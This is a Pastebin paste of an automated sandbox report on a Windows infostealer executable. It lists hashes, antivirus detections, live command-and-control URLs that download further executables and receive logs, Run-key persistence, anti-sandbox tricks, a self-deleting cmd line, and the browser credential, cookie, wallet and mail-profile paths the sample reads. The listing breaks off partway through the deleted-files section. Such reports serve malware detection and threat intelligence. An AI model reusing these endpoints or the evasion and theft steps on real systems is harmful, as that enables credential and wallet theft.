paladin316

Exes_99c013e0f90e934015ba6c8461f19188_exe.json

Jun 19th, 2019
2,242
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 102.76 KB | None | 0 0
  1.  
  2. [*] MalFamily: "Malicious"
  3.  
  4. [*] MalScore: 10.0
  5.  
  6. [*] File Name: "Exes_99c013e0f90e934015ba6c8461f19188.exe"
  7. [*] File Size: 270848
  8. [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. [*] SHA256: "94869576b92022ee8e17fd3d6663fdae331870eb9d83854787626b32f3ad84f8"
  10. [*] MD5: "99c013e0f90e934015ba6c8461f19188"
  11. [*] SHA1: "d544ee6203fe3aa4fc00b34f6fdd7d39a5a75228"
  12. [*] SHA512: "5c13cc6805735b8c5cafdaf28f724aef3531fe2cf6d40a98a418e86a437894722790c4a50b68b5945a63b35c51c626be502159cfd5ea1b42ee62692841baab0c"
  13. [*] CRC32: "8F8A0867"
  14. [*] SSDEEP: "6144:PSELKBp3KQtXWJno+MzgiZR0VenCYYhrN:PDIp3KQ1WJo+ypEe2N"
  15.  
  16. [*] Process Execution: [
  17. "Exes_99c013e0f90e934015ba6c8461f19188.exe",
  18. "wincrbg.exe",
  19. "1186034710.exe",
  20. "2683410667.exe",
  21. "cmd.exe",
  22. "PING.EXE",
  23. "services.exe",
  24. "lsass.exe",
  25. "lsass.exe",
  26. "lsass.exe",
  27. "taskhost.exe",
  28. "svchost.exe",
  29. "WerFault.exe",
  30. "wermgr.exe"
  31. ]
  32.  
  33. [*] Signatures Detected: [
  34. {
  35. "Description": "At least one process apparently crashed during execution",
  36. "Details": []
  37. },
  38. {
  39. "Description": "Attempts to connect to a dead IP:Port (3 unique times)",
  40. "Details": [
  41. {
  42. "IP": "172.217.165.14:443"
  43. },
  44. {
  45. "IP": "34.65.152.120:80"
  46. },
  47. {
  48. "IP": "172.217.164.225:443"
  49. }
  50. ]
  51. },
  52. {
  53. "Description": "Creates RWX memory",
  54. "Details": []
  55. },
  56. {
  57. "Description": "A process attempted to delay the analysis task.",
  58. "Details": [
  59. {
  60. "Process": "wincrbg.exe tried to sleep 666 seconds, actually delayed analysis time by 0 seconds"
  61. }
  62. ]
  63. },
  64. {
  65. "Description": "At least one IP Address, Domain, or File Name was found in a crypto call",
  66. "Details": [
  67. {
  68. "ioc": "http://crl.globalsign.net/root-r2.crl0"
  69. }
  70. ]
  71. },
  72. {
  73. "Description": "Network anomalies occured during the analysis.",
  74. "Details": [
  75. {
  76. "Anomaly": "'1.1.1.1' getaddrinfo with no actual connection to the IP."
  77. }
  78. ]
  79. },
  80. {
  81. "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
  82. "Details": []
  83. },
  84. {
  85. "Description": "A process created a hidden window",
  86. "Details": [
  87. {
  88. "Process": "wincrbg.exe -> C:\\Users\\user\\AppData\\Local\\Temp\\1945315514.exe"
  89. },
  90. {
  91. "Process": "2683410667.exe -> cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q \"C:\\Users\\user\\AppData\\Local\\Temp\\2683410667.exe\""
  92. }
  93. ]
  94. },
  95. {
  96. "Description": "Drops a binary and executes it",
  97. "Details": [
  98. {
  99. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\2683410667.exe"
  100. },
  101. {
  102. "binary": "C:\\Windows\\5858332514687312\\wincrbg.exe"
  103. },
  104. {
  105. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\1186034710.exe"
  106. }
  107. ]
  108. },
  109. {
  110. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  111. "Details": [
  112. {
  113. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  114. },
  115. {
  116. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  117. },
  118. {
  119. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  120. },
  121. {
  122. "suspicious_request": "http://193.32.161.77/tldr.php?new=1"
  123. },
  124. {
  125. "suspicious_request": "http://193.32.161.77/tldr.php?on=1"
  126. },
  127. {
  128. "suspicious_request": "http://193.32.161.77/1.exe"
  129. },
  130. {
  131. "suspicious_request": "http://193.32.161.77/2.exe"
  132. },
  133. {
  134. "suspicious_request": "http://193.32.161.77/3.exe"
  135. },
  136. {
  137. "suspicious_request": "http://193.32.161.77/4.exe"
  138. },
  139. {
  140. "suspicious_request": "http://193.32.161.77/5.exe"
  141. },
  142. {
  143. "suspicious_request": "http://34.65.152.120/gate/log.php"
  144. },
  145. {
  146. "suspicious_request": "http://34.65.152.120/gate/sqlite3.dll"
  147. },
  148. {
  149. "suspicious_request": "http://34.65.152.120/gate/libs.zip"
  150. },
  151. {
  152. "suspicious_request": "http://34.65.152.120/file_handler/file.php?hash=a0946e9787798262e287064a4c241a14dd4b012e&js=b4c2f4ef1ddb6bd1713011242356f39f3d72c032&callback=http://34.65.152.120/gate"
  153. }
  154. ]
  155. },
  156. {
  157. "Description": "Performs some HTTP requests",
  158. "Details": [
  159. {
  160. "url": "http://193.32.161.77/tldr.php?new=1"
  161. },
  162. {
  163. "url": "http://193.32.161.77/tldr.php?on=1"
  164. },
  165. {
  166. "url": "http://193.32.161.77/1.exe"
  167. },
  168. {
  169. "url": "http://193.32.161.77/2.exe"
  170. },
  171. {
  172. "url": "http://193.32.161.77/3.exe"
  173. },
  174. {
  175. "url": "http://193.32.161.77/4.exe"
  176. },
  177. {
  178. "url": "http://193.32.161.77/5.exe"
  179. },
  180. {
  181. "url": "http://34.65.152.120/gate/log.php"
  182. },
  183. {
  184. "url": "http://34.65.152.120/gate/sqlite3.dll"
  185. },
  186. {
  187. "url": "http://34.65.152.120/gate/libs.zip"
  188. },
  189. {
  190. "url": "http://34.65.152.120/file_handler/file.php?hash=a0946e9787798262e287064a4c241a14dd4b012e&js=b4c2f4ef1ddb6bd1713011242356f39f3d72c032&callback=http://34.65.152.120/gate"
  191. }
  192. ]
  193. },
  194. {
  195. "Description": "Detects Sandboxie through the presence of a library",
  196. "Details": []
  197. },
  198. {
  199. "Description": "Detects SunBelt Sandbox through the presence of a library",
  200. "Details": []
  201. },
  202. {
  203. "Description": "Attempts to remove evidence of file being downloaded from the Internet",
  204. "Details": [
  205. {
  206. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\1186034710.exe:Zone.Identifier"
  207. }
  208. ]
  209. },
  210. {
  211. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  212. "Details": [
  213. {
  214. "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 14210604 times"
  215. }
  216. ]
  217. },
  218. {
  219. "Description": "Steals private information from local Internet browsers",
  220. "Details": [
  221. {
  222. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  223. },
  224. {
  225. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  226. },
  227. {
  228. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  229. }
  230. ]
  231. },
  232. {
  233. "Description": "Installs itself for autorun at Windows startup",
  234. "Details": [
  235. {
  236. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services"
  237. },
  238. {
  239. "data": "C:\\Windows\\5858332514687312\\wincrbg.exe"
  240. },
  241. {
  242. "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services"
  243. },
  244. {
  245. "data": "C:\\Windows\\5858332514687312\\wincrbg.exe"
  246. }
  247. ]
  248. },
  249. {
  250. "Description": "Collects information about installed applications",
  251. "Details": [
  252. {
  253. "Program": "Microsoft Access Setup Metadata MUI 2013"
  254. },
  255. {
  256. "Program": "Microsoft Groove MUI 2013"
  257. },
  258. {
  259. "Program": "Microsoft Word MUI 2013"
  260. },
  261. {
  262. "Program": "Adobe Refresh Manager"
  263. },
  264. {
  265. "Program": "Microsoft Excel MUI 2013"
  266. },
  267. {
  268. "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
  269. },
  270. {
  271. "Program": "Microsoft Outlook MUI 2013"
  272. },
  273. {
  274. "Program": "Microsoft Publisher MUI 2013"
  275. },
  276. {
  277. "Program": "Python 2.7.15"
  278. },
  279. {
  280. "Program": "Microsoft Office Proofing 2013"
  281. },
  282. {
  283. "Program": "Adobe Flash Player 29 ActiveX"
  284. },
  285. {
  286. "Program": "Python Launcher"
  287. },
  288. {
  289. "Program": "Microsoft Lync MUI 2013"
  290. },
  291. {
  292. "Program": "Microsoft InfoPath MUI 2013"
  293. },
  294. {
  295. "Program": "Python 2.7 PIL-1.1.7"
  296. },
  297. {
  298. "Program": "Microsoft DCF MUI 2013"
  299. }
  300. ]
  301. },
  302. {
  303. "Description": "Creates a hidden or system file",
  304. "Details": [
  305. {
  306. "file": "C:\\Windows\\5858332514687312"
  307. },
  308. {
  309. "file": "C:\\Windows\\5858332514687312\\wincrbg.exe"
  310. },
  311. {
  312. "file": "C:\\Users\\user\\AppData\\Roaming\\winsvcs.txt"
  313. }
  314. ]
  315. },
  316. {
  317. "Description": "File has been identified by 21 Antiviruses on VirusTotal as malicious",
  318. "Details": [
  319. {
  320. "FireEye": "Generic.mg.99c013e0f90e9340"
  321. },
  322. {
  323. "Cylance": "Unsafe"
  324. },
  325. {
  326. "Symantec": "ML.Attribute.HighConfidence"
  327. },
  328. {
  329. "APEX": "Malicious"
  330. },
  331. {
  332. "Paloalto": "generic.ml"
  333. },
  334. {
  335. "Kaspersky": "UDS:DangerousObject.Multi.Generic"
  336. },
  337. {
  338. "AegisLab": "Trojan.Multi.Generic.4!c"
  339. },
  340. {
  341. "Endgame": "malicious (high confidence)"
  342. },
  343. {
  344. "Invincea": "heuristic"
  345. },
  346. {
  347. "SentinelOne": "DFI - Malicious PE"
  348. },
  349. {
  350. "Microsoft": "Trojan:Win32/Conteban.B!ml"
  351. },
  352. {
  353. "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
  354. },
  355. {
  356. "Acronis": "suspicious"
  357. },
  358. {
  359. "VBA32": "BScope.Trojan.Fuerboos"
  360. },
  361. {
  362. "MAX": "malware (ai score=93)"
  363. },
  364. {
  365. "ESET-NOD32": "a variant of Win32/Kryptik.GUCQ"
  366. },
  367. {
  368. "Rising": "Trojan.Kryptik!8.8 (CLOUD)"
  369. },
  370. {
  371. "Fortinet": "Malicious_Behavior.SB"
  372. },
  373. {
  374. "AVG": "FileRepMalware"
  375. },
  376. {
  377. "CrowdStrike": "win/malicious_confidence_70% (W)"
  378. },
  379. {
  380. "Qihoo-360": "HEUR/QVM10.2.F6F3.Malware.Gen"
  381. }
  382. ]
  383. },
  384. {
  385. "Description": "Checks the system manufacturer, likely for anti-virtualization",
  386. "Details": []
  387. },
  388. {
  389. "Description": "Operates on local firewall's policies and settings",
  390. "Details": []
  391. },
  392. {
  393. "Description": "Creates a copy of itself",
  394. "Details": [
  395. {
  396. "copy": "C:\\Windows\\5858332514687312\\wincrbg.exe"
  397. },
  398. {
  399. "copy": "C:\\Users\\user\\AppData\\Local\\Temp\\1186034710.exe"
  400. }
  401. ]
  402. },
  403. {
  404. "Description": "Attempts to disable System Restore",
  405. "Details": []
  406. },
  407. {
  408. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  409. "Details": [
  410. {
  411. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets"
  412. }
  413. ]
  414. },
  415. {
  416. "Description": "Harvests information related to installed mail clients",
  417. "Details": [
  418. {
  419. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
  420. },
  421. {
  422. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Microsoft Outlook Internet Settings"
  423. },
  424. {
  425. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
  426. },
  427. {
  428. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts"
  429. },
  430. {
  431. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Account Manager\\Accounts"
  432. },
  433. {
  434. "key": "HKEY_CURRENT_USER\\Identities\\{0A258175-2D14-4D69-9955-E200F247250F}\\Software\\Microsoft\\Internet Account Manager\\Accounts"
  435. }
  436. ]
  437. },
  438. {
  439. "Description": "Attempts to modify or disable Security Center warnings",
  440. "Details": []
  441. },
  442. {
  443. "Description": "Likely use of Domain Generation Algorithm (DGA)",
  444. "Details": []
  445. },
  446. {
  447. "Description": "Generates some ICMP traffic",
  448. "Details": []
  449. },
  450. {
  451. "Description": "Attempts to interact with an Alternate Data Stream (ADS)",
  452. "Details": [
  453. {
  454. "file": "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_99c013e0f90e934015ba6c8461f19188.exe:Zone.Iduentifier"
  455. },
  456. {
  457. "file": "C:\\Windows\\5858332514687312\\wincrbg.exe:Zone.Iduentifier"
  458. }
  459. ]
  460. },
  461. {
  462. "Description": "Collects information to fingerprint the system",
  463. "Details": []
  464. },
  465. {
  466. "Description": "Created network traffic indicative of malicious activity",
  467. "Details": [
  468. {
  469. "signature": "ET TROJAN Generic -POST To file.php w/Extended ASCII Characters"
  470. },
  471. {
  472. "signature": "ET TROJAN Single char EXE direct download likely trojan (multiple families)"
  473. },
  474. {
  475. "signature": "ET DNS Query for .su TLD (Soviet Union) Often Malware Related"
  476. }
  477. ]
  478. }
  479. ]
  480.  
  481. [*] Started Service: [
  482. "VaultSvc",
  483. "WerSvc"
  484. ]
  485.  
  486. [*] Executed Commands: [
  487. "C:\\Windows\\5858332514687312\\wincrbg.exe",
  488. "C:\\Users\\user\\AppData\\Local\\Temp\\1186034710.exe",
  489. "C:\\Users\\user\\AppData\\Local\\Temp\\2683410667.exe",
  490. "C:\\Users\\user\\AppData\\Local\\Temp\\1945315514.exe",
  491. "C:\\Users\\user\\AppData\\Local\\Temp\\1945315514.exe ",
  492. "cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q \"C:\\Users\\user\\AppData\\Local\\Temp\\2683410667.exe\"",
  493. "C:\\Windows\\system32\\lsass.exe",
  494. "taskhost.exe $(Arg0)",
  495. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
  496. "C:\\Windows\\system32\\PING.EXE ping 1.1.1.1 -n 1 -w 3000",
  497. "C:\\Windows\\system32\\WerFault.exe -u -p 2220 -s 288",
  498. "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_cd449376f6223cf7a93dfe5d65a7144586b089d_cab_03050dcc\""
  499. ]
  500.  
  501. [*] Mutexes: [
  502. "850867085",
  503. "rc/user",
  504. "Local\\WERReportingForProcess2220",
  505. "Global\\\\xe5\\x88\\x90\\xc2\\x9c",
  506. "Global\\\\xed\\x95\\xb0\\xc7\\xa8",
  507. "WERUI_BEX64-cd449376f6223cf7a93dfe5d65a7144586b089d"
  508. ]
  509.  
  510. [*] Modified Files: [
  511. "C:\\Windows\\5858332514687312\\wincrbg.exe",
  512. "C:\\Users\\user\\AppData\\Roaming\\winsvcs.txt",
  513. "C:\\Users\\user\\AppData\\Local\\Temp\\1186034710.exe",
  514. "C:\\Users\\user\\AppData\\Local\\Temp\\2683410667.exe",
  515. "C:\\Users\\user\\AppData\\Local\\Temp\\1945315514.exe",
  516. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\8BGZLQBV\\sqlite3[1].dll",
  517. "C:\\Users\\user\\AppData\\Local\\Temp\\P1kAlMiG2K",
  518. "C:\\Users\\user\\AppData\\Local\\Temp\\b7FzP5tM1Q",
  519. "C:\\Users\\user\\AppData\\Local\\Temp\\BI6DSS92c3",
  520. "C:\\Users\\user\\AppData\\Local\\Temp\\1Apgjk9lVK",
  521. "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\S4VH3RFR\\libs[1].zip",
  522. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\nssdbm3.dll",
  523. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\prldap60.dll",
  524. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\qipcap.dll",
  525. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\softokn3.dll",
  526. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\ucrtbase.dll",
  527. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\vcruntime140.dll",
  528. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\AccessibleHandler.dll",
  529. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\AccessibleMarshal.dll",
  530. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\breakpadinjector.dll",
  531. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\freebl3.dll",
  532. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\IA2Marshal.dll",
  533. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\ldap60.dll",
  534. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\ldif60.dll",
  535. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\lgpllibs.dll",
  536. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\libEGL.dll",
  537. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\MapiProxy.dll",
  538. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\MapiProxy_InUse.dll",
  539. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\mozglue.dll",
  540. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\mozMapi32.dll",
  541. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\mozMapi32_InUse.dll",
  542. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\msvcp140.dll",
  543. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\nss3.dll",
  544. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\nssckbi.dll",
  545. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-namedpipe-l1-1-0.dll",
  546. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-processenvironment-l1-1-0.dll",
  547. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-processthreads-l1-1-0.dll",
  548. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-processthreads-l1-1-1.dll",
  549. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-profile-l1-1-0.dll",
  550. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-rtlsupport-l1-1-0.dll",
  551. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-string-l1-1-0.dll",
  552. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-synch-l1-1-0.dll",
  553. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-synch-l1-2-0.dll",
  554. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-sysinfo-l1-1-0.dll",
  555. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-timezone-l1-1-0.dll",
  556. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-util-l1-1-0.dll",
  557. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-conio-l1-1-0.dll",
  558. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-convert-l1-1-0.dll",
  559. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-environment-l1-1-0.dll",
  560. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-filesystem-l1-1-0.dll",
  561. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-heap-l1-1-0.dll",
  562. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-locale-l1-1-0.dll",
  563. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-math-l1-1-0.dll",
  564. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-multibyte-l1-1-0.dll",
  565. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-private-l1-1-0.dll",
  566. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-process-l1-1-0.dll",
  567. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-runtime-l1-1-0.dll",
  568. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-stdio-l1-1-0.dll",
  569. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-string-l1-1-0.dll",
  570. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-time-l1-1-0.dll",
  571. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-utility-l1-1-0.dll",
  572. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-file-l1-2-0.dll",
  573. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-file-l2-1-0.dll",
  574. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-handle-l1-1-0.dll",
  575. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-heap-l1-1-0.dll",
  576. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-interlocked-l1-1-0.dll",
  577. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-libraryloader-l1-1-0.dll",
  578. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-localization-l1-2-0.dll",
  579. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-memory-l1-1-0.dll",
  580. "C:\\Users\\user\\AppData\\Local\\Temp\\machineinfo.txt",
  581. "C:\\Users\\user\\AppData\\Local\\Temp\\Log.zip",
  582. "C:\\Users\\user\\AppData\\Local\\Temp\\screen.png",
  583. "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
  584. "C:\\Windows\\sysnative\\LogFiles\\Scm\\b85eb07c-e4c2-4cc7-b68b-6975d428f4e0",
  585. "\\??\\Nul",
  586. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WER9CEE.tmp.appcompat.txt",
  587. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA00C.tmp.WERInternalMetadata.xml",
  588. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA03C.tmp.hdmp",
  589. "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAB78.tmp.mdmp",
  590. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_cd449376f6223cf7a93dfe5d65a7144586b089d_cab_03050dcc\\WER9CEE.tmp.appcompat.txt",
  591. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_cd449376f6223cf7a93dfe5d65a7144586b089d_cab_03050dcc\\WERA00C.tmp.WERInternalMetadata.xml",
  592. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_cd449376f6223cf7a93dfe5d65a7144586b089d_cab_03050dcc\\WERA03C.tmp.hdmp",
  593. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_cd449376f6223cf7a93dfe5d65a7144586b089d_cab_03050dcc\\WERAB78.tmp.mdmp",
  594. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_cd449376f6223cf7a93dfe5d65a7144586b089d_cab_03050dcc\\Report.wer",
  595. "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_cd449376f6223cf7a93dfe5d65a7144586b089d_cab_03050dcc\\Report.wer.tmp"
  596. ]
  597.  
  598. [*] Deleted Files: [
  599. "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_99c013e0f90e934015ba6c8461f19188.exe:Zone.Iduentifier",
  600. "C:\\Windows\\5858332514687312\\wincrbg.exe:Zone.Iduentifier",
  601. "C:\\Users\\user\\AppData\\Local\\Temp\\1186034710.exe:Zone.Identifier",
  602. "C:\\Users\\user\\AppData\\Local\\Temp\\2683410667.exe:Zone.Identifier",
  603. "C:\\Users\\user\\AppData\\Local\\Temp\\1945315514.exe:Zone.Identifier",
  604. "C:\\Users\\user\\AppData\\Local\\Temp\\P1kAlMiG2K",
  605. "C:\\Users\\user\\AppData\\Local\\Temp\\b7FzP5tM1Q",
  606. "C:\\Users\\user\\AppData\\Local\\Temp\\BI6DSS92c3",
  607. "C:\\Users\\user\\AppData\\Local\\Temp\\1Apgjk9lVK",
  608. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\ff-funcs.zip",
  609. "C:\\Users\\user\\AppData\\Local\\Temp\\Log.zip",
  610. "C:\\Users\\user\\AppData\\Local\\Temp\\passwords.txt",
  611. "C:\\Users\\user\\AppData\\Local\\Temp\\CC.txt",
  612. "C:\\Users\\user\\AppData\\Local\\Temp\\chrome_cookie.txt",
  613. "C:\\Users\\user\\AppData\\Local\\Temp\\firefox_cookie.txt",
  614. "C:\\Users\\user\\AppData\\Local\\Temp\\chrome_autofill.txt",
  615. "C:\\Users\\user\\AppData\\Local\\Temp\\machineinfo.txt",
  616. "C:\\Users\\user\\AppData\\Local\\Temp\\screen.png",
  617. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\AccessibleHandler.dll",
  618. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\AccessibleMarshal.dll",
  619. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-file-l1-2-0.dll",
  620. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-file-l2-1-0.dll",
  621. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-handle-l1-1-0.dll",
  622. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-heap-l1-1-0.dll",
  623. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-interlocked-l1-1-0.dll",
  624. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-libraryloader-l1-1-0.dll",
  625. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-localization-l1-2-0.dll",
  626. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-memory-l1-1-0.dll",
  627. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-namedpipe-l1-1-0.dll",
  628. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-processenvironment-l1-1-0.dll",
  629. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-processthreads-l1-1-0.dll",
  630. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-processthreads-l1-1-1.dll",
  631. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-profile-l1-1-0.dll",
  632. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-rtlsupport-l1-1-0.dll",
  633. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-string-l1-1-0.dll",
  634. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-synch-l1-1-0.dll",
  635. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-synch-l1-2-0.dll",
  636. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-sysinfo-l1-1-0.dll",
  637. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-timezone-l1-1-0.dll",
  638. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-core-util-l1-1-0.dll",
  639. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-conio-l1-1-0.dll",
  640. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-convert-l1-1-0.dll",
  641. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-environment-l1-1-0.dll",
  642. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-filesystem-l1-1-0.dll",
  643. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-heap-l1-1-0.dll",
  644. "C:\\Users\\user\\AppData\\Local\\Temp\\AdLibs\\api-ms-win-crt-locale-l1-1-0.dll",
